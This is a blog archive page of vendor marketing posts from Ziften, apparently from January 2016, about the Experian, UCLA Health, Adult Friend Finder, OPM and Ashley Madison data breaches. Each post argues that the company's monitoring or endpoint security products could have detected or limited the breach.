Monthly Archives: January 2016

Charles Leaver – In Order To Learn From Their Previous Errors Experian Need To Use Continuous Monitoring

Published by:

Written By Josh Applebaum And Presented By Charles Leaver Ziften CEO

Experian Need To Learn from Past Errors And Implement A Continuous Monitoring Solution

Operating in the security sector, I’ve always felt my job was hard to explain to the typical individual. Over the last couple of years, that has actually changed. Regrettably, we are seeing a brand-new data breach announced every few weeks, with much more that are kept secret. These breaches are getting front page headlines, and I can now discuss to my friends exactly what I do without losing them after a few sentences. Nevertheless, I still question what it is we’re learning from all of this. As it turns out, many businesses are not learning from their own errors.

Experian, the worldwide credit reporting firm, is a business with a lot to learn. A number of months ago Experian announced it had actually found its servers had actually been breached and that client data had been taken. When Experian revealed the breach they reassured consumers that “our consumer credit database was not accessed in this incident, and no credit card or banking info was taken.” Although Experian made the effort in their announcement to assure their consumers that their financial details had not been taken, they elaborated further on what data actually was stolen: clients’ names, addresses, Social Security numbers, birth dates, driver’s license numbers, military ID numbers, passport numbers, and additional information utilized in T- Mobile’s own credit evaluation. This is scary for two reasons: the very first is the kind of data that was taken; the 2nd is the fact that this isn’t the very first time this has actually taken place to Experian.

Although the hackers didn’t leave with “payment card or banking details” they did walk away with personal data that could be exploited to open new credit card, banking, and other financial accounts. This in itself is a factor the T-Mobile consumers included ought to be nervous. However, all Experian consumers ought to be a little worried.

As it ends up, this isn’t really the very first time the Experian servers have been jeopardized by hackers. In early 2014, T-Mobile had actually announced that a “reasonably small” number of their customers had their personal details taken when Experian’s servers were breached. Brian Krebs has an extremely well-written blog post about how the hackers breached the Experian servers the first time, so we won’t enter into excessive information here. In the very first breach of Experian’s servers, hackers had exploited a vulnerability in the organization’s support ticket system that was left exposed without initially needing a user to confirm before utilizing it. Now to the scary part: although it has actually become widely understood that the hackers made use of a vulnerability in the company’s support ticket system to provide access, it wasn’t up until not long after the 2nd hack that their support ticket system was shut down.

It would be difficult to imagine that it was a coincidence that Experian chose to close down their support ticket system mere weeks after they announced they had been breached. If this wasn’t a coincidence, then let’s ask: exactly what did Experian find out from the first breach where consumers got away with sensitive client data? Companies who save their clients’ delicate info must be held accountable to not just protect their consumers’ data, but if likewise to make sure that if breached they plug up the holes that are discovered while examining the attack.

When businesses are investigating a breach (or possible breach) it is important that they have access to historical data so those investigating can attempt to piece back together the puzzle of how the cyber attack unfolded. At Ziften, we offer a solution that permits our customers to have a continuous, real-time view of the whole picture that occurs in their environment. In addition to supplying real-time visibility for identifying attacks as they happen, our constant monitoring system records all historic data to enable customers to “rewind the tape” and piece together what had taken place in their environment, despite how far back they have to look. With this new visibility, it is now possible to not only discover that a breach occurred, but to likewise discover why a breach occurred, and hopefully learn from past errors to keep them from happening again.


Charles Leaver – Isn’t It Time We Learned From Incidents Such As The UCLA Health Data Breach?

Published by:

Written By Craig Hand And Presented By Ziften CEO Charles Leaver

UCLA Health Data Breach Probably Down To Inferior Security

UCLA Health announced on July 17th 2015 that it was the victim of a health data breach affecting as much as 4.5 million health care clients from the four health centers it runs in the Southern California region. As stated by UCLA Health authorities, Personally Identifiable Information (PII) and Protected Health Information (PHI) was accessed however no proof yet suggests that the data was stolen. This data went as far back as 1990. The authorities likewise specified that there was no proof at this time, that any charge card or financial data was accessed.

“At this time” is key here. The details accessed (or potentially stolen, its definitely hard to know at this moment) is essentially good for the life of that individual and potentially still useful past the death of that individual. The details offered to the criminals consisted of: Names, Addresses, Contact numbers, Social Security Numbers, Medical condition, Medications prescribed, Medical procedures performed, and test outcomes.

Little is known about this cyber attack similar to many others we find out about but never ever hear any genuine details on. UCLA Health found uncommon activity in sectors of their network in October of 2014 (although access potentially started one month earlier), and instantly called the FBI. Finally, by May 2015 – a complete 7 months later – detectives specified that a data breach had happened. Again, officials claim that the assailants are probably highly sophisticated, and not in the country. Finally, we the public get to hear about a breach a full two months later on July 17, 2015.

It’s been stated numerous times previously that we as security specialists need to be certain 100% of the time, while the cyber criminals only have to discover that 1% that we may not have the ability to rectify. Based on our research about the breach, the bottom line is UCLA Health had inferior security practices. One factor is based on the easy fact that the accessed data was not encrypted. We have had HIPAA now for some time, UCLA is a well renowned bastion of Higher Education, yet still they failed to secure data in the easiest ways. The claim that these were highly advanced individuals is also suspect, as so far no genuine proof has been disclosed. After all, when is the last time that a company that has been breached declared it wasn’t from an “sophisticated” attack? Even if they declare they have such proof, as members of the public we will not see it in order to vet it properly.

Because there isn’t really enough disclosed details about the breach, its difficult to figure out if any system would have assisted in finding the breach sooner instead of later on. Nevertheless, if the breach began with malware being provided to and executed by a UCLA Health network user, the likelihood that Ziften could have helped in discovering the malware and potentially stopping it would have been fairly high. Ziften might have likewise notified on suspicious, unidentified, or known malware as well as any interactions the malware might have made in order to spread internally or to exfiltrate data to an external host.

When are we going to learn? As all of us understand, it’s not a matter of if, but when, companies will be attacked. Smart organizations are preparing for the inevitable with detection and response services that reduce damage.


Charles Leaver – Data Leak At Adult Friend Finder Preventable With Ziften Endpoint Security

Published by:

Written By Chuck McAuley And Presented By Charles Leaver Ziften CEO

Endpoint Security Is The Best Friend For Adult Friend Finder

Adult Friend Finder, an online “dating service” and its affiliates were hacked in April. The breached information included charge card numbers, usernames, passwords, dates of birth, address details and personal – you understand – preferences. What’s frequently not highlighted in these cases is the monetary worth of such a breach. Numerous would argue that having an email address and the associated data might be of little value. Nevertheless, much the same way metadata collection provides insight to the NSA, this type of information offers attackers with plenty of leverage that can be used against the general public. Spear phishing ends up being a lot easier when assailants not only have an email address, however also area, language, and race. The source IP addresses gathered can even provide pinpoint street locations for attacks.

The attack approach released in this instance was not publicized, however it would be fair to assume that it leveraged a sort of SQL Injection attack or similar, where the data is wormed out of the back-end database through a defect in the webserver. Another possible mechanism could have been pirating ssh keys from a compromised admin account or github, but those tend to be secondary for the most part. Either way, the database dump itself is 570 Mb, and presuming the data was exfiltrated in a few big transactions, it would have been really visible on a network level. That is, if Adult Friend Finder were utilizing a solution that offered visibility into network traffic.

Ziften ZFlow ™ enables network visibility into the cloud to catch aberrant data transfers and attribute to particular executing procedures. In this case, the administrator would have had two opportunities to observe the irregularity: 1) At the database level, as the data was extracted. 2) At the webserver level, where an unusual quantity of traffic would be sent to a particular address. Organizations like Adult Friend Finder must acquire the needed endpoint and network visibility required to secure their consumers’ personal data and “hook up” with a business like Ziften.


Charles Leaver – The Preventable OPM Breach Caused Compromise Of Biometric Data

Published by:

Written By Mike Hamilton And Presented By Ziften CEO Charles Leaver


Greater Security Protection of Personal and Biometric Data Required After OPM Breach




Recently, I had to go through a relatively comprehensive background check process. At the time it was one of those circumstances where you sign into the portal, provide your social security number, a plethora of delicate info about you and your household, and trust the federal government (and their specialists) to take care of that personal data.

As I got back home the other evening and sat down to begin composing this blog post, I looked at the stack of mail laying on my desk and discovered one of those envelopes with the perforated edges that generally contain sensitive information.

Obviously, you need to open those types of envelopes. Sadly at that moment all my worst concerns had actually come to life.

Exactly what I discovered was my personal letter detailing that basically every delicate piece of details one might want to know about me – along with similar info on 21 million other Americans – was accessed during the OPM breach.




Oh, and incidentally, there’s the problem that my biometric identity was likewise compromised:




At this moment, although “federal professionals” believe that it’s not a major issue, my iPhone disagrees with them. Bruce Schneier composed an exceptional piece on this, so I will not belabor the points he makes. But at some point all of us have to ask some tough questions:

When is this going to stop?

Who is responsible for stopping it?

Who is going to in fact stop it?

Who is going to be held responsible when breaches occur?

These kinds of cyber attacks are why at Ziften we are so passionately developing our next-generation security tools. While we as a security provider may never entirely stop or prevent these kinds of breaches from occurring, perhaps we can make them so much more difficult and time consuming. When you think about it, till the community states “we can’t take anymore” this is going to continue to take place every day.

Charles Leaver – Ashley Madison Breach May Have Been Avoided With Ziften Endpoint Security

Published by:

Written By Michael Vaughn And Presented By Charles Leaver Ziften CEO


Life is Too Short to Not Execute Endpoint Security.


Ashley Madison’s tagline is “Life is short. Have an affair.” It appears security falls a bit short at the business, however, as countless customer records were blasted out for the entire world to see in a recent breach. Openly, there are only theories as to who precisely infiltrated the outrageous operation. It might have been an insider. Other possibilities, such as the notorious hacking group Impact Team, are declaring victory over the red-lettered company. However exactly what appears is the publicly-published list of thirty two million user identities. Additionally, CEO Noel Biderman lost his position, and the company is taking on an insurmountable number of lawsuits.

It has actually been discovered that bots were communicating with users, and the user population included just a small number of women. In a farcical style, the site still specifies it received a “Trusted Security Award” and offers complete discretion for its users. Their claim of “Over 42,705,000 confidential members!” on the home page is as outrageous as the service they offer. The taken list of users is so quickly accessible that 3rd parties have actually currently produced interactive sites with the names and addresses of the exposed cheaters. Per Ashley Madison’s media page, they “instantly implemented a thorough investigation utilizing leading forensics professionals and other security experts to figure out the origin, nature, and impact of this incident.” If Ashley Madison had been more proactive in their techniques of endpoint security, they could have potentially been informed of the breach and stopped it before data could have been stolen.

Advanced endpoint security and forensic applications – for example those offered by Ziften – could have potentially prevented this organization from the shame it has had to deal with. Not only could Ziften have actually notified security leads of the suspect network events in the dead of night of a cyber attack, however it could have avoided a range of actions on the database from being carried out, all while letting their security group sleep a little better. Life is too short to let security problems keep you awake at night.